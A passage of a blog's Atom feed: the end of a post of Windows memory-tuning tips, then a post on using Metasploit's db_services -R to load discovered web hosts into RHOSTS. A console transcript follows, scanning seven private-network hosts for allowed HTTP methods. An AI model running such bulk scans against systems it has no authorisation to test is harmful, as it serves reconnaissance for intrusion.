LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer. Create a new DWORD value&lt;br /&gt;
named AlwaysUnloadDll, and give it a data value of 1. Exit the Registry, and reboot for the new&lt;br /&gt;
setting to take effect. Note that this setting might cause problems with some programs. Some&lt;br /&gt;
Windows programs—especially older and 16-bit programs—can issue error messages with this&lt;br /&gt;
setting in effect, so if that starts happening, delete the new key, or give it a value of 0.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;b&gt;Avoid DOS applications&lt;/b&gt;&lt;br /&gt;
DOS applications may not allow Windows to manage memory properly, and they hold on to the&lt;br /&gt;
memory they use, not allowing it to be swapped out for use for other programs or processes. If you&lt;br /&gt;
use any DOS applications, replace them with Windows versions.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;b&gt;Disable Aero&lt;/b&gt;&lt;br /&gt;
If you’re using Aero in Windows Vista, turn it off. Right-click the desktop, and select Personalize.&lt;br /&gt;
Then choose Window Color and Appearance→“Open classic appearance properties” for more color&lt;br /&gt;
options. Select a non-Aero theme, and click OK.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;b&gt;Reduce the applications and services running in the background&lt;/b&gt;&lt;br /&gt;
You might have many programs and services running in the background, without realizing it. Look at&lt;br /&gt;
your Notifi cation area, and see if there are any programs running that you don’t require. Shut them&lt;br /&gt;
down, and go into their confi guration settings to make sure they don’t load at startup.  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-2934341526517163850?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/2934341526517163850/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/05/general-advice-for-improving-ram.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/2934341526517163850?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/2934341526517163850?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/05/general-advice-for-improving-ram.html' title='General Advice For Improving RAM performance'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;A0AEQn89eSp7ImA9WhZWEEo.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-4134816230698967004</id><published>2011-05-10T19:08:00.000-07:00</published><updated>2011-05-10T19:08:23.161-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-05-10T19:08:23.161-07:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Stuff'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title>Running Auxiliary Modules Against Multiple Hosts in a Sexy Manner</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://securemachine.files.wordpress.com/2011/03/lemjh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="247" src="http://securemachine.files.wordpress.com/2011/03/lemjh.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;So a couple of cool updates finally to metasploit framework. If you inspect "&lt;b&gt;db_services&lt;/b&gt;", you will perhaps(:P) see a super cool and sexy feature of&amp;nbsp;&lt;b&gt; "-R".&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: blue;"&gt;&lt;i&gt;&amp;nbsp;msf auxiliary(http_version) &amp;gt; db_services -h&lt;br /&gt;
&lt;br /&gt;
Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;-a&amp;nbsp;&amp;nbsp; Search for a list of addresses&lt;br /&gt;
&amp;nbsp;-c&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Only show the given columns&lt;br /&gt;
&amp;nbsp;-h,--help&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Show this help information&lt;br /&gt;
&amp;nbsp;-n&amp;nbsp;&amp;nbsp; Search for a list of service names&lt;br /&gt;
&amp;nbsp;-p&amp;nbsp;&amp;nbsp; Search for a list of ports&lt;br /&gt;
&amp;nbsp;-r&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Only show [tcp|udp] services&lt;br /&gt;
&amp;nbsp;-u,--up&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Only show services which are up&lt;br /&gt;
&amp;nbsp;-o&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Send output to a file in csv format&lt;br /&gt;
&amp;nbsp;-R,--rhosts&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Set RHOSTS from the results of the search&lt;br /&gt;
&lt;br /&gt;
Available columns: created_at, info, name, port, proto, state, updated_at&lt;/i&gt;&lt;/div&gt;&lt;div style="color: blue;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: blue;"&gt;&lt;span style="color: black;"&gt;Till now, only listing hosts by ports (using db_services -p 80) wass possible. however if you want to use those hosts and wanna throw modules at them, "-R" options comes handy.&lt;/span&gt;&lt;/div&gt;&lt;div style="color: blue;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: blue;"&gt;&lt;i&gt;msf auxiliary(http_version) &amp;gt; use auxiliary/scanner/http/options&lt;br /&gt;
msf auxiliary(options) &amp;gt; db_services -R -p 80&lt;br /&gt;
&lt;br /&gt;
Services&lt;br /&gt;
========&lt;br /&gt;
&lt;br /&gt;
host&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; port&amp;nbsp; proto&amp;nbsp; name&amp;nbsp; state&amp;nbsp; info&lt;br /&gt;
----&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ----&amp;nbsp; -----&amp;nbsp; ----&amp;nbsp; -----&amp;nbsp; ----&lt;br /&gt;
192.168.1.245&amp;nbsp; 80&amp;nbsp;&amp;nbsp;&amp;nbsp; tcp&amp;nbsp;&amp;nbsp;&amp;nbsp; http&amp;nbsp; open&amp;nbsp;&amp;nbsp; Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 )&lt;br /&gt;
192.168.1.246&amp;nbsp; 80&amp;nbsp;&amp;nbsp;&amp;nbsp; tcp&amp;nbsp;&amp;nbsp;&amp;nbsp; http&amp;nbsp; open&amp;nbsp;&amp;nbsp; Apache/2.2.3 (CentOS)&lt;br /&gt;
192.168.1.247&amp;nbsp; 80&amp;nbsp;&amp;nbsp;&amp;nbsp; tcp&amp;nbsp;&amp;nbsp;&amp;nbsp; http&amp;nbsp; open&amp;nbsp;&amp;nbsp; Apache/2.2.12 (Ubuntu)&lt;br /&gt;
192.168.1.248&amp;nbsp; 80&amp;nbsp;&amp;nbsp;&amp;nbsp; tcp&amp;nbsp;&amp;nbsp;&amp;nbsp; http&amp;nbsp; open&amp;nbsp;&amp;nbsp; lighttpd/1.5.0&lt;br /&gt;
192.168.1.249&amp;nbsp; 80&amp;nbsp;&amp;nbsp;&amp;nbsp; tcp&amp;nbsp;&amp;nbsp;&amp;nbsp; http&amp;nbsp; open&amp;nbsp;&amp;nbsp; Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.11&lt;br /&gt;
192.168.1.251&amp;nbsp; 80&amp;nbsp;&amp;nbsp;&amp;nbsp; tcp&amp;nbsp;&amp;nbsp;&amp;nbsp; http&amp;nbsp; open&amp;nbsp;&amp;nbsp; Apache&lt;br /&gt;
192.168.1.254&amp;nbsp; 80&amp;nbsp;&amp;nbsp;&amp;nbsp; tcp&amp;nbsp;&amp;nbsp;&amp;nbsp; http&amp;nbsp; open&amp;nbsp;&amp;nbsp; Apache/2.2.3 (CentOS)&lt;br /&gt;
&lt;br /&gt;
RHOSTS =&amp;gt; file:/tmp/msf-db-rhosts-20110423-27121-10wiuni-0&lt;br /&gt;
&lt;br /&gt;
msf auxiliary(options) &amp;gt; run&lt;br /&gt;
&lt;br /&gt;
[*] Scanned 1 of 7 hosts (014% complete)&lt;br /&gt;
[*] Scanned 2 of 7 hosts (028% complete)&lt;br /&gt;
[*] 192.168.1.247 allows GET,HEAD,POST,OPTIONS methods&lt;br /&gt;
[*] Scanned 3 of 7 hosts (042% complete)&lt;br /&gt;
[*]192.168.1.248 allows OPTIONS, GET, HEAD, POST methods&lt;br /&gt;
[*] Scanned 4 of 7 hosts (057% complete)&lt;br /&gt;
[*] 192.168.1.249 allows GET,HEAD,POST,OPTIONS,TRACE methods&lt;br /&gt;
[*] Scanned 5 of 7 hosts (071% complete)&lt;br /&gt;
[*] Scanned 6 of 7 hosts (085% complete)&lt;br /&gt;
[*] Scanned 7 of 7 hosts (100% complete)&lt;br /&gt;
[*] Auxiliary module execution completed&lt;/i&gt;&lt;/div&gt;&lt;div style="color: blue;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: blue;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-4134816230698967004?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/4134816230698967004/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/05/running-auxiliary-modules-against.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4134816230698967004?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4134816230698967004?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/05/running-auxiliary-modules-against.html' title='Running Auxiliary Modules Against Multiple Hosts in a Sexy Manner'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry></feed>